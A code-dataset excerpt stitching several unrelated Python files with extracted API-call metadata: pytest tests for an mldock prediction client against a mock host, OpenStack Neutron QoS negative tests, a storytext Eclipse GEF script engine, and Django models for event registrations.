with pytest.raises(requests.exceptions.RequestException):
_ = handle_prediction(
host="http://nothing-to-see-here/invocations",
request="tests/api/fixtures/payload.csv",
response_file=None,
request_content_type="text/csv",
response_content_type="application/json",
)
"""
TEST SUCCESS STATUS_CODE=200 SCENERIO
"""
@staticmethod
def test_handle_prediction_send_json_success_200():
with patch("mldock.api.predict.execute_request") as mock_execute_request:
mock_execute_request.return_value = MockResponse(
json_data={"result": "success"}, status_code=200
)
_ = handle_prediction(
host="http://nothing-to-see-here/invocations",
request="tests/api/fixtures/payload.json",
response_file=None,
request_content_type="application/json",
response_content_type="application/json",
)
validation_kwargs = {
"url": "http://nothing-to-see-here/invocations",
"headers": {"Content-Type": "application/json"},
}
_, kwargs = list(mock_execute_request.call_args)
data_obj = kwargs.pop("data")
assert (
kwargs == validation_kwargs
), "Failure. URL and Headers are incorrect."
assert isinstance(data_obj, str), "Failure. Expected str json object."
@staticmethod
def test_handle_prediction_sending_image_jpeg_success_200(image_bytes):
with patch("mldock.api.predict.execute_request") as mock_execute_request:
mock_execute_request.return_value = MockResponse(
_content=image_bytes, status_code=200
)
_ = handle_prediction(
host="http://nothing-to-see-here/invocations",
request="tests/api/fixtures/eight.png",
response_file=None,
request_content_type="image/jpeg",
response_content_type="image/jpeg",
)
validation_kwargs = {
"url": "http://nothing-to-see-here/invocations",
"headers": {"Content-Type": "image/jpeg"},
}
_, kwargs = list(mock_execute_request.call_args)
data_obj = kwargs.pop("data")
assert (
kwargs == validation_kwargs
), "Failure. URL and Headers are incorrect."
assert isinstance(
data_obj, io.BytesIO
), "Failure. Expected io.BytesIO object."
@staticmethod
def test_handle_prediction_sending_text_csv_success_200():
with patch("mldock.api.predict.execute_request") as mock_execute_request:
mock_execute_request.return_value = MockResponse(
text="greet,name\nhello,sam", status_code=200
)
_ = handle_prediction(
host="http://nothing-to-see-here/invocations",
request="tests/api/fixtures/payload.csv",
response_file=None,
request_content_type="text/csv",
response_content_type="text/csv",
)
validation_kwargs = {
"url": "http://nothing-to-see-here/invocations",
"headers": {"Content-Type": "text/csv"},
}
_, kwargs = list(mock_execute_request.call_args)
data_obj = kwargs.pop("data")
assert (
kwargs == validation_kwargs
), "Failure. URL and Headers are incorrect."
assert isinstance(data_obj, str), "Failure. Expected str json object."
"""
TEST WRITING RESPONSE TO FILE SCENERIO
"""
@staticmethod
def test_handle_prediction_send_json_success_write_response_file():
with tempfile.TemporaryDirectory() as tmp_dir:
response_filepath = Path(tmp_dir, "response.json")
with patch("mldock.api.predict.execute_request") as mock_execute_request:
mock_execute_request.return_value = MockResponse(
json_data={"result": "success"}, status_code=200
)
_ = handle_prediction(
host="http://nothing-to-see-here/invocations",
request="tests/api/fixtures/payload.json",
response_file=response_filepath,
request_content_type="application/json",
response_content_type="application/json",
)
assert (
response_filepath.is_file()
), "Failure. outputfile was not created"
@staticmethod
def test_handle_prediction_sending_image_jpeg_success_write_response_file(
image_bytes,
):
with tempfile.TemporaryDirectory() as tmp_dir:
response_filepath = Path(tmp_dir, "response.png")
with patch("mldock.api.predict.execute_request") as mock_execute_request:
mock_execute_request.return_value = MockResponse(
_content=image_bytes, status_code=200
)
_ = handle_prediction(
host="http://nothing-to-see-here/invocations",
request="tests/api/fixtures/eight.png",
response_file=response_filepath,
request_content_type="image/jpeg",
response_content_type="image/jpeg",
)
assert (
response_filepath.is_file()
), "Failure. outputfile was not created"
@staticmethod
def test_handle_prediction_sending_text_csv_success_write_response_file():
with tempfile.TemporaryDirectory() as tmp_dir:
response_filepath = Path(tmp_dir, "response.csv")
with patch("mldock.api.predict.execute_request") as mock_execute_request:
mock_execute_request.return_value = MockResponse(
text="greet,name\nhello,sam", status_code=200
)
_ = handle_prediction(
host="http://nothing-to-see-here/invocations",
request="tests/api/fixtures/payload.csv",
response_file=response_filepath,
request_content_type="text/csv",
response_content_type="text/csv",
)
assert (
response_filepath.is_file()
), "Failure. outputfile was not created"
"""
TEST ADDING ADDTIONAL HEADERS
"""
@staticmethod
def test_handle_prediction_send_json_success_add_headers():
with patch("mldock.api.predict.execute_request") as mock_execute_request:
mock_execute_request.return_value = MockResponse(
json_data={"result": "success"}, status_code=200
)
_ = handle_prediction(
host="http://nothing-to-see-here/invocations",
request="tests/api/fixtures/payload.json",
response_file=None,
request_content_type="application/json",
response_content_type="application/json",
headers={"Authentication": "bearer 12345"},
)
validation_kwargs = {
"url": "http://nothing-to-see-here/invocations",
"headers": {
"Content-Type": "application/json",
"Authentication": "bearer 12345",
},
}
_, kwargs = list(mock_execute_request.call_args)
kwargs.pop("data")
assert (
kwargs == validation_kwargs
), "Failure. URL and Headers are incorrect."
| [
"tempfile.TemporaryDirectory",
"PIL.Image.open",
"mldock.api.predict.handle_prediction",
"mock.patch",
"pathlib.Path",
"io.BytesIO",
"responses.add",
"pytest.raises"
] | [((379, 431), 'PIL.Image.open', 'Image.open', (['"""tests/api/fixtures/eight.png"""'], {'mode': '"""r"""'}), "('tests/api/fixtures/eight.png', mode='r')\n", (389, 431), False, 'from PIL import Image\n'), ((451, 463), 'io.BytesIO', 'io.BytesIO', ([], {}), '()\n', (461, 463), False, 'import io\n'), ((915, 1034), 'responses.add', 'responses.add', (['responses.POST', '"""http://nothing-to-see-here/invocations"""'], {'json': "{'error': 'client error'}", 'status': '(404)'}), "(responses.POST, 'http://nothing-to-see-here/invocations',\n json={'error': 'client error'}, status=404)\n", (928, 1034), False, 'import responses\n'), ((1599, 1718), 'responses.add', 'responses.add', (['responses.POST', '"""http://nothing-to-see-here/invocations"""'], {'json': "{'error': 'client error'}", 'status': '(404)'}), "(responses.POST, 'http://nothing-to-see-here/invocations',\n json={'error': 'client error'}, status=404)\n", (1612, 1718), False, 'import responses\n'), ((2272, 2391), 'responses.add', 'responses.add', (['responses.POST', '"""http://nothing-to-see-here/invocations"""'], {'json': "{'error': 'client error'}", 'status': '(404)'}), "(responses.POST, 'http://nothing-to-see-here/invocations',\n json={'error': 'client error'}, status=404)\n", (2285, 2391), False, 'import responses\n'), ((1103, 1154), 'pytest.raises', 'pytest.raises', (['requests.exceptions.RequestException'], {}), '(requests.exceptions.RequestException)\n', (1116, 1154), False, 'import pytest\n'), ((1172, 1396), 'mldock.api.predict.handle_prediction', 'handle_prediction', ([], {'host': '"""http://nothing-to-see-here/invocations"""', 'request': '"""tests/api/fixtures/payload.json"""', 'response_file': 'None', 'request_content_type': '"""application/json"""', 'response_content_type': '"""application/json"""'}), "(host='http://nothing-to-see-here/invocations', request=\n 'tests/api/fixtures/payload.json', response_file=None,\n request_content_type='application/json', response_content_type=\n 'application/json')\n", (1189, 1396), False, 'from mldock.api.predict import send_image_jpeg, send_csv, send_json, handle_prediction\n'), ((1787, 1838), 'pytest.raises', 'pytest.raises', (['requests.exceptions.RequestException'], {}), '(requests.exceptions.RequestException)\n', (1800, 1838), False, 'import pytest\n'), ((1856, 2071), 'mldock.api.predict.handle_prediction', 'handle_prediction', ([], {'host': '"""http://nothing-to-see-here/invocations"""', 'request': '"""tests/api/fixtures/eight.png"""', 'response_file': 'None', 'request_content_type': '"""image/jpeg"""', 'response_content_type': '"""application/json"""'}), "(host='http://nothing-to-see-here/invocations', request=\n 'tests/api/fixtures/eight.png', response_file=None,\n request_content_type='image/jpeg', response_content_type='application/json'\n )\n", (1873, 2071), False, 'from mldock.api.predict import send_image_jpeg, send_csv, send_json, handle_prediction\n'), ((2460, 2511), 'pytest.raises', 'pytest.raises', (['requests.exceptions.RequestException'], {}), '(requests.exceptions.RequestException)\n', (2473, 2511), False, 'import pytest\n'), ((2529, 2739), 'mldock.api.predict.handle_prediction', 'handle_prediction', ([], {'host': '"""http://nothing-to-see-here/invocations"""', 'request': '"""tests/api/fixtures/payload.csv"""', 'response_file': 'None', 'request_content_type': '"""text/csv"""', 'response_content_type': '"""application/json"""'}), "(host='http://nothing-to-see-here/invocations', request=\n 'tests/api/fixtures/payload.csv', response_file=None,\n request_content_type='text/csv', response_content_type='application/json')\n", (2546, 2739), False, 'from mldock.api.predict import send_image_jpeg, send_csv, send_json, handle_prediction\n'), ((2978, 3021), 'mock.patch', 'patch', (['"""mldock.api.predict.execute_request"""'], {}), "('mldock.api.predict.execute_request')\n", (2983, 3021), False, 'from mock import patch\n'), ((3204, 3428), 'mldock.api.predict.handle_prediction', 'handle_prediction', ([], {'host': '"""http://nothing-to-see-here/invocations"""', 'request': '"""tests/api/fixtures/payload.json"""', 'response_file': 'None', 'request_content_type': '"""application/json"""', 'response_content_type': '"""application/json"""'}), "(host='http://nothing-to-see-here/invocations', request=\n 'tests/api/fixtures/payload.json', response_file=None,\n request_content_type='application/json', response_content_type=\n 'application/json')\n", (3221, 3428), False, 'from mldock.api.predict import send_image_jpeg, send_csv, send_json, handle_prediction\n'), ((4107, 4150), 'mock.patch', 'patch', (['"""mldock.api.predict.execute_request"""'], {}), "('mldock.api.predict.execute_request')\n", (4112, 4150), False, 'from mock import patch\n'), ((4322, 4526), 'mldock.api.predict.handle_prediction', 'handle_prediction', ([], {'host': '"""http://nothing-to-see-here/invocations"""', 'request': '"""tests/api/fixtures/eight.png"""', 'response_file': 'None', 'request_content_type': '"""image/jpeg"""', 'response_content_type': '"""image/jpeg"""'}), "(host='http://nothing-to-see-here/invocations', request=\n 'tests/api/fixtures/eight.png', response_file=None,\n request_content_type='image/jpeg', response_content_type='image/jpeg')\n", (4339, 4526), False, 'from mldock.api.predict import send_image_jpeg, send_csv, send_json, handle_prediction\n'), ((5229, 5272), 'mock.patch', 'patch', (['"""mldock.api.predict.execute_request"""'], {}), "('mldock.api.predict.execute_request')\n", (5234, 5272), False, 'from mock import patch\n'), ((5452, 5654), 'mldock.api.predict.handle_prediction', 'handle_prediction', ([], {'host': '"""http://nothing-to-see-here/invocations"""', 'request': '"""tests/api/fixtures/payload.csv"""', 'response_file': 'None', 'request_content_type': '"""text/csv"""', 'response_content_type': '"""text/csv"""'}), "(host='http://nothing-to-see-here/invocations', request=\n 'tests/api/fixtures/payload.csv', response_file=None,\n request_content_type='text/csv', response_content_type='text/csv')\n", (5469, 5654), False, 'from mldock.api.predict import send_image_jpeg, send_csv, send_json, handle_prediction\n'), ((6390, 6419), 'tempfile.TemporaryDirectory', 'tempfile.TemporaryDirectory', ([], {}), '()\n', (6417, 6419), False, 'import tempfile\n'), ((6465, 6495), 'pathlib.Path', 'Path', (['tmp_dir', '"""response.json"""'], {}), "(tmp_dir, 'response.json')\n", (6469, 6495), False, 'from pathlib import Path\n'), ((7369, 7398), 'tempfile.TemporaryDirectory', 'tempfile.TemporaryDirectory', ([], {}), '()\n', (7396, 7398), False, 'import tempfile\n'), ((7444, 7473), 'pathlib.Path', 'Path', (['tmp_dir', '"""response.png"""'], {}), "(tmp_dir, 'response.png')\n", (7448, 7473), False, 'from pathlib import Path\n'), ((8292, 8321), 'tempfile.TemporaryDirectory', 'tempfile.TemporaryDirectory', ([], {}), '()\n', (8319, 8321), False, 'import tempfile\n'), ((8367, 8396), 'pathlib.Path', 'Path', (['tmp_dir', '"""response.csv"""'], {}), "(tmp_dir, 'response.csv')\n", (8371, 8396), False, 'from pathlib import Path\n'), ((9262, 9305), 'mock.patch', 'patch', (['"""mldock.api.predict.execute_request"""'], {}), "('mldock.api.predict.execute_request')\n", (9267, 9305), False, 'from mock import patch\n'), ((9488, 9756), 'mldock.api.predict.handle_prediction', 'handle_prediction', ([], {'host': '"""http://nothing-to-see-here/invocations"""', 'request': '"""tests/api/fixtures/payload.json"""', 'response_file': 'None', 'request_content_type': '"""application/json"""', 'response_content_type': '"""application/json"""', 'headers': "{'Authentication': 'bearer 12345'}"}), "(host='http://nothing-to-see-here/invocations', request=\n 'tests/api/fixtures/payload.json', response_file=None,\n request_content_type='application/json', response_content_type=\n 'application/json', headers={'Authentication': 'bearer 12345'})\n", (9505, 9756), False, 'from mldock.api.predict import send_image_jpeg, send_csv, send_json, handle_prediction\n'), ((6513, 6556), 'mock.patch', 'patch', (['"""mldock.api.predict.execute_request"""'], {}), "('mldock.api.predict.execute_request')\n", (6518, 6556), False, 'from mock import patch\n'), ((6755, 6992), 'mldock.api.predict.handle_prediction', 'handle_prediction', ([], {'host': '"""http://nothing-to-see-here/invocations"""', 'request': '"""tests/api/fixtures/payload.json"""', 'response_file': 'response_filepath', 'request_content_type': '"""application/json"""', 'response_content_type': '"""application/json"""'}), "(host='http://nothing-to-see-here/invocations', request=\n 'tests/api/fixtures/payload.json', response_file=response_filepath,\n request_content_type='application/json', response_content_type=\n 'application/json')\n", (6772, 6992), False, 'from mldock.api.predict import send_image_jpeg, send_csv, send_json, handle_prediction\n'), ((7491, 7534), 'mock.patch', 'patch', (['"""mldock.api.predict.execute_request"""'], {}), "('mldock.api.predict.execute_request')\n", (7496, 7534), False, 'from mock import patch\n'), ((7722, 7939), 'mldock.api.predict.handle_prediction', 'handle_prediction', ([], {'host': '"""http://nothing-to-see-here/invocations"""', 'request': '"""tests/api/fixtures/eight.png"""', 'response_file': 'response_filepath', 'request_content_type': '"""image/jpeg"""', 'response_content_type': '"""image/jpeg"""'}), "(host='http://nothing-to-see-here/invocations', request=\n 'tests/api/fixtures/eight.png', response_file=response_filepath,\n request_content_type='image/jpeg', response_content_type='image/jpeg')\n", (7739, 7939), False, 'from mldock.api.predict import send_image_jpeg, send_csv, send_json, handle_prediction\n'), ((8414, 8457), 'mock.patch', 'patch', (['"""mldock.api.predict.execute_request"""'], {}), "('mldock.api.predict.execute_request')\n", (8419, 8457), False, 'from mock import patch\n'), ((8653, 8868), 'mldock.api.predict.handle_prediction', 'handle_prediction', ([], {'host': '"""http://nothing-to-see-here/invocations"""', 'request': '"""tests/api/fixtures/payload.csv"""', 'response_file': 'response_filepath', 'request_content_type': '"""text/csv"""', 'response_content_type': '"""text/csv"""'}), "(host='http://nothing-to-see-here/invocations', request=\n 'tests/api/fixtures/payload.csv', response_file=response_filepath,\n request_content_type='text/csv', response_content_type='text/csv')\n", (8670, 8868), False, 'from mldock.api.predict import send_image_jpeg, send_csv, send_json, handle_prediction\n')] |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.db import constants as db_const
from tempest.lib import decorators
from tempest.lib import exceptions as lib_exc
from tempest import test
from neutron.tests.tempest.api import base
LONG_NAME_NG = 'z' * (db_const.NAME_FIELD_SIZE + 1)
LONG_DESCRIPTION_NG = 'z' * (db_const.LONG_DESCRIPTION_FIELD_SIZE + 1)
LONG_TENANT_ID_NG = 'z' * (db_const.PROJECT_ID_FIELD_SIZE + 1)
class QosNegativeTestJSON(base.BaseAdminNetworkTest):
required_extensions = ['qos']
@test.attr(type='negative')
@decorators.idempotent_id('b9dce555-d3b3-11e5-950a-54ee757c77da')
def test_add_policy_with_too_long_name(self):
self.assertRaises(lib_exc.BadRequest,
self.client.create_qos_policy,
LONG_NAME_NG, 'test policy desc1', False)
@test.attr(type='negative')
@decorators.idempotent_id('b9dce444-d3b3-11e5-950a-54ee747c99db')
def test_add_policy_with_too_long_description(self):
self.assertRaises(lib_exc.BadRequest,
self.client.create_qos_policy,
'test-policy', LONG_DESCRIPTION_NG, False)
@test.attr(type='negative')
@decorators.idempotent_id('b9dce444-d3b3-11e5-950a-54ee757c77dc')
def test_add_policy_with_too_long_tenant_id(self):
self.assertRaises(lib_exc.BadRequest,
self.client.create_qos_policy,
'test-policy', 'test policy desc1',
False, LONG_TENANT_ID_NG)
| [
"tempest.lib.decorators.idempotent_id",
"tempest.test.attr"
] | [((1056, 1082), 'tempest.test.attr', 'test.attr', ([], {'type': '"""negative"""'}), "(type='negative')\n", (1065, 1082), False, 'from tempest import test\n'), ((1088, 1152), 'tempest.lib.decorators.idempotent_id', 'decorators.idempotent_id', (['"""b9dce555-d3b3-11e5-950a-54ee757c77da"""'], {}), "('b9dce555-d3b3-11e5-950a-54ee757c77da')\n", (1112, 1152), False, 'from tempest.lib import decorators\n'), ((1380, 1406), 'tempest.test.attr', 'test.attr', ([], {'type': '"""negative"""'}), "(type='negative')\n", (1389, 1406), False, 'from tempest import test\n'), ((1412, 1476), 'tempest.lib.decorators.idempotent_id', 'decorators.idempotent_id', (['"""b9dce444-d3b3-11e5-950a-54ee747c99db"""'], {}), "('b9dce444-d3b3-11e5-950a-54ee747c99db')\n", (1436, 1476), False, 'from tempest.lib import decorators\n'), ((1712, 1738), 'tempest.test.attr', 'test.attr', ([], {'type': '"""negative"""'}), "(type='negative')\n", (1721, 1738), False, 'from tempest import test\n'), ((1744, 1808), 'tempest.lib.decorators.idempotent_id', 'decorators.idempotent_id', (['"""b9dce444-d3b3-11e5-950a-54ee757c77dc"""'], {}), "('b9dce444-d3b3-11e5-950a-54ee757c77dc')\n", (1768, 1808), False, 'from tempest.lib import decorators\n')] |
""" Don't load any Eclipse stuff at global scope, needs to be importable previous to Eclipse starting """
from storytext import javarcptoolkit
import sys
class ScriptEngine(javarcptoolkit.ScriptEngine):
def createReplayer(self, universalLogging=False, **kw):
return UseCaseReplayer(self.uiMap, universalLogging, self.recorder, **kw)
def getDefaultTestscriptPluginName(self):
return "org.eclipse.swtbot.gef.testscript"
class UseCaseReplayer(javarcptoolkit.UseCaseReplayer):
def getDescriberPackage(self):
return javarcptoolkit.UseCaseReplayer.__module__
def getTestRunnerClass(self):
return TestRunner
class TestRunner(javarcptoolkit.TestRunner):
def initEclipsePackages(self):
javarcptoolkit.TestRunner.initEclipsePackages(self)
from org.eclipse.swtbot.eclipse.gef.finder import SWTGefBot
from org.eclipse.swtbot.eclipse.gef.finder.widgets import SWTBotGefViewer
from org.eclipse.draw2d import FigureCanvas
from org.eclipse.draw2d.geometry import Rectangle
from org.eclipse.gef import EditPart
| [
"storytext.javarcptoolkit.TestRunner.initEclipsePackages"
] | [((748, 799), 'storytext.javarcptoolkit.TestRunner.initEclipsePackages', 'javarcptoolkit.TestRunner.initEclipsePackages', (['self'], {}), '(self)\n', (793, 799), False, 'from storytext import javarcptoolkit\n')] |
# -*- coding: utf-8 -*-
# Copyright (c) 2011,2014 <NAME> <<EMAIL>>
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import datetime
import logging
import traceback
from django.core.mail import EmailMessage
from django.db import models
from django.template import Context, Template
logger = logging.getLogger(__name__)
AFDELINGEN = (
("AMS", "Amsterdam"),
("AN", "Arnhem-Nijmegen"),
("BB", "Brabant"),
("FR", "Friesland"),
("GR", "Groningen"),
("LH", "Leiden-Haaglanden"),
("MS", "Limburg"),
("RD", "Rotterdam"),
("TW", "Overijssel"),
("UT", "Utrecht"),
("WN", "Wageningen"),
("INT", "Internationaal"),
)
def afdeling_text(afd):
for key, value in AFDELINGEN:
if key == afd:
return value
return None
QUESTION_TYPES = (
("INT", "Integer"),
("TXT", "Text Input"),
("AFD", "Afdeling"),
("BOOL", "Ja/Nee"),
("CHOICE", "Multiple Choice"),
("TEXT", "HTML Text"),
)
class Event(models.Model):
name = models.CharField(max_length=200)
slug = models.SlugField()
start_registration = models.DateTimeField()
end_registration = models.DateTimeField()
description = models.TextField()
contact_email = models.EmailField()
email_template = models.TextField(help_text="Enkele placeholders: {{voornaam}}, {{achternaam}}, {{inschrijf_opties}}")
price = models.IntegerField(help_text="Eurocenten", default=0)
max_registrations = models.IntegerField(default=0, help_text="Als groter dan 0, bepaalt maximaal aantal inschrijvingen")
class Meta:
ordering = ('-end_registration',)
def __str__(self):
return self.name
def subscribed(self):
return len(Registration.objects.filter(event=self))
def paid(self):
return len(Registration.objects.filter(event=self).filter(paid=True))
def total_paid(self):
return "\u20AC %.2f" % (sum([e.price for e in self.registrations.filter(paid=True)]) / 100.)
def form_link(self):
return "<a href=\"https://events.jongedemocraten.nl/inschrijven/%s/\">Inschrijven</a>" % (self.slug)
form_link.allow_tags = True
def all_free(self):
"""Are all event options free?"""
if self.price != 0:
return False
if len(EventOption.objects.filter(price__gt=0).filter(question__event=self)):
return False
return True
def active(self):
now = datetime.datetime.now()
if self.start_registration > now or self.end_registration < now:
return False
return True
# active.boolean = True
def price_str(self):
return "\u20AC %.2f" % (float(self.price) / 100)
def is_full(self):
if self.max_registrations <= 0:
return False
return self.registrations.count() >= self.max_registrations
is_full.boolean = True
def get_registrations_over_limit(self):
results = []
if self.max_registrations > 0:
results += self.registrations.order_by('pk')[int(self.max_registrations):]
for question in self.eventquestion_set.all():
for option in question.options.all():
results += option.get_registrations_over_limit()
return results
class EventQuestion(models.Model):
event = models.ForeignKey(Event)
name = models.CharField(max_length=64)
question_type = models.CharField(max_length=16, choices=QUESTION_TYPES)
required = models.BooleanField(default=False, help_text='Bij Ja/Nee: verplicht aanvinken; bij andere: verplicht invullen')
radio = models.BooleanField(default=False, help_text='Voor multiple-choice/afdeling: geen dropdown maar radio buttons')
order = models.IntegerField(default=0, help_text='Bepaalt volgorde op formulier; gebruik order<0 voor elementen vooraf aan voornaam, achternaam en email')
text = models.TextField(blank=True, default='', help_text='Voor "HTML Text"; geldige HTML tags: a, b/strong, code, em/i, h3, img, ul, ol, li, p, br; Geldige HTML attributen: class, style, a.href, a.target, img.src, img.alt')
def __str__(self):
return "%s (%s)" % (self.name, self.question_type)
def form_id(self):
return "q%d" % (self.id)
def delete_event_question(self):
return '<a href="/deleteEventQuestion/?optionId=%d">Delete</a>' % (self.id)
delete_event_question.allow_tags = True
class EventOption(models.Model):
question = models.ForeignKey('EventQuestion', related_name="options")
name = models.CharField(max_length=200)
price = models.IntegerField(help_text="Eurocenten", default=0)
active = models.BooleanField(default=True)
order = models.IntegerField(default=0)
limit = models.IntegerField(default=0, help_text="Aantal beschikbare plekken (0 = geen limiet)")
def __str__(self):
if self.price < 0:
return "%s: \u20AC %.2f korting" % (self.name, float(-self.price) / 100)
if self.price > 0:
return "%s: \u20AC %.2f" % (self.name, float(self.price) / 100)
else:
return "%s" % (self.name,)
def price_str(self):
return "\u20AC %.2f" % (float(self.price) / 100)
def delete_event_option(self):
return '<a href="/deleteEventOption/?optionId=%d">Delete</a>' % (self.id)
delete_event_option.allow_tags = True
def get_related_registrations(self):
return Registration.objects.filter(answers__option=self).order_by('pk')
def num_registrations(self):
registrations = self.get_related_registrations()
return registrations.count()
def is_full(self):
if self.limit <= 0:
return False
return self.num_registrations() >= self.limit
is_full.boolean = True
def limit_str(self):
if self.limit <= 0:
return "-"
return "{}/{}".format(self.num_registrations(), self.limit)
limit_str.short_description = "Limit usage"
def get_registrations_over_limit(self):
if self.limit <= 0:
return []
registrations = self.get_related_registrations()
return registrations[int(self.limit):]
def limit_reached(self):
return self.is_full()
limit_reached.boolean = True
class Registration(models.Model):
registration_date = models.DateTimeField(auto_now_add=True)
first_name = models.CharField(max_length=64)
last_name = models.CharField(max_length=64)
email = models.EmailField(blank=True)
event = models.ForeignKey(Event, related_name='registrations')
price = models.IntegerField(default=0)
paid = models.BooleanField(default=False)
status = models.CharField(max_length=64, default="", blank=True)
trxid = models.CharField(max_length=128, default="", blank=True)
def calculate_price(self):
self.price = self.event.price + sum([answer.option.price for answer in self.answers.exclude(option=None)])
def get_options_text(self):
results = []
added_default_fields = False
answers = {a.question: a.get_answer() for a in self.answers.all()}
for question in self.event.eventquestion_set.order_by('order'):
if question.order >= 0 and not added_default_fields:
results += ["Voornaam: {}".format(self.first_name)]
results += ["Achternaam: {}".format(self.last_name)]
results += ["Email: {}".format(self.email)]
added_default_fields = True
if question in answers:
results += ["{}: {}".format(question.name, answers[question])]
if not added_default_fields:
results += ["Voornaam: {}".format(self.first_name)]
results += ["Achternaam: {}".format(self.last_name)]
results += ["Email: {}".format(self.email)]
return '\n'.join(results)
def __str__(self):
return "%s %s - %s - %s" % (self.first_name, self.last_name, self.event, str(self.price))
def gen_subscription_id(self):
num_id = str(self.id)
safe = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789")
return num_id + "x" + filter(lambda c: c in safe, self.get_options_name())[:15 - len(num_id)]
def send_confirmation_email(self):
t = Template(self.event.email_template)
c = Context({
"voornaam": self.first_name,
"achternaam": self.last_name,
"inschrijf_opties": self.get_options_text(),
})
rendered_mail = t.render(c)
email = EmailMessage(
subject="Inschrijfbevestiging: %s" % (self.event.name),
body=rendered_mail,
from_email=self.event.contact_email,
to=[self.email],
)
try:
email.send()
except:
logger.error("Could not send welcome mail to %s" % (self.email))
logger.error(traceback.format_exc())
raise
return rendered_mail
class Answer(models.Model):
# This should maybe be a "through" model
registration = models.ForeignKey(Registration, related_name='answers')
question = models.ForeignKey(EventQuestion)
int_field = models.IntegerField(default=0, null=True)
txt_field = models.CharField(max_length=256, blank=True)
bool_field = models.BooleanField(default=False)
option = models.ForeignKey(EventOption, default=None, null=True, blank=True)
def __str__(self):
return "%s - %s" % (self.question, self.get_answer())
def set_answer(self, ans):
if self.question.question_type == "INT":
self.int_field = ans
elif self.question.question_type == "TXT":
self.txt_field = ans
elif self.question.question_type == "AFD":
self.txt_field = ans
elif self.question.question_type == "BOOL":
self.bool_field = ans
if self.bool_field and len(self.question.options.all()):
self.option = self.question.options.all()[0]
else:
self.option = None
elif self.question.question_type == "CHOICE":
self.option = ans
def get_answer(self):
if self.question.question_type == "INT":
return self.int_field
elif self.question.question_type == "TXT":
return self.txt_field
elif self.question.question_type == "AFD":
return afdeling_text(self.txt_field)
elif self.question.question_type == "BOOL":
if self.option is not None:
return self.option
else:
return self.bool_field and 'Ja' or 'Nee'
elif self.question.question_type == "CHOICE":
return self.option
| [
"logging.getLogger",
"django.db.models.EmailField",
"traceback.format_exc",
"django.db.models.TextField",
"django.db.models.IntegerField",
"django.db.models.ForeignKey",
"django.template.Template",
"django.db.models.BooleanField",
"datetime.datetime.now",
"django.db.models.SlugField",
"django.db... | [((965, 992), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (982, 992), False, 'import logging\n'), ((1677, 1709), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (1693, 1709), False, 'from django.db import models\n'), ((1721, 1739), 'django.db.models.SlugField', 'models.SlugField', ([], {}), '()\n', (1737, 1739), False, 'from django.db import models\n'), ((1765, 1787), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {}), '()\n', (1785, 1787), False, 'from django.db import models\n'), ((1811, 1833), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {}), '()\n', (1831, 1833), False, 'from django.db import models\n'), ((1852, 1870), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (1868, 1870), False, 'from django.db import models\n'), ((1891, 1910), 'django.db.models.EmailField', 'models.EmailField', ([], {}), '()\n', (1908, 1910), False, 'from django.db import models\n'), ((1932, 2038), 'django.db.models.TextField', 'models.TextField', ([], {'help_text': '"""Enkele placeholders: {{voornaam}}, {{achternaam}}, {{inschrijf_opties}}"""'}), "(help_text=\n 'Enkele placeholders: {{voornaam}}, {{achternaam}}, {{inschrijf_opties}}')\n", (1948, 2038), False, 'from django.db import models\n'), ((2046, 2100), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'help_text': '"""Eurocenten"""', 'default': '(0)'}), "(help_text='Eurocenten', default=0)\n", (2065, 2100), False, 'from django.db import models\n'), ((2125, 2230), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)', 'help_text': '"""Als groter dan 0, bepaalt maximaal aantal inschrijvingen"""'}), "(default=0, help_text=\n 'Als groter dan 0, bepaalt maximaal aantal inschrijvingen')\n", (2144, 2230), False, 'from django.db import models\n'), ((3973, 3997), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Event'], {}), '(Event)\n', (3990, 3997), False, 'from django.db import models\n'), ((4009, 4040), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(64)'}), '(max_length=64)\n', (4025, 4040), False, 'from django.db import models\n'), ((4061, 4116), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(16)', 'choices': 'QUESTION_TYPES'}), '(max_length=16, choices=QUESTION_TYPES)\n', (4077, 4116), False, 'from django.db import models\n'), ((4132, 4248), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)', 'help_text': '"""Bij Ja/Nee: verplicht aanvinken; bij andere: verplicht invullen"""'}), "(default=False, help_text=\n 'Bij Ja/Nee: verplicht aanvinken; bij andere: verplicht invullen')\n", (4151, 4248), False, 'from django.db import models\n'), ((4256, 4372), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)', 'help_text': '"""Voor multiple-choice/afdeling: geen dropdown maar radio buttons"""'}), "(default=False, help_text=\n 'Voor multiple-choice/afdeling: geen dropdown maar radio buttons')\n", (4275, 4372), False, 'from django.db import models\n'), ((4380, 4536), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)', 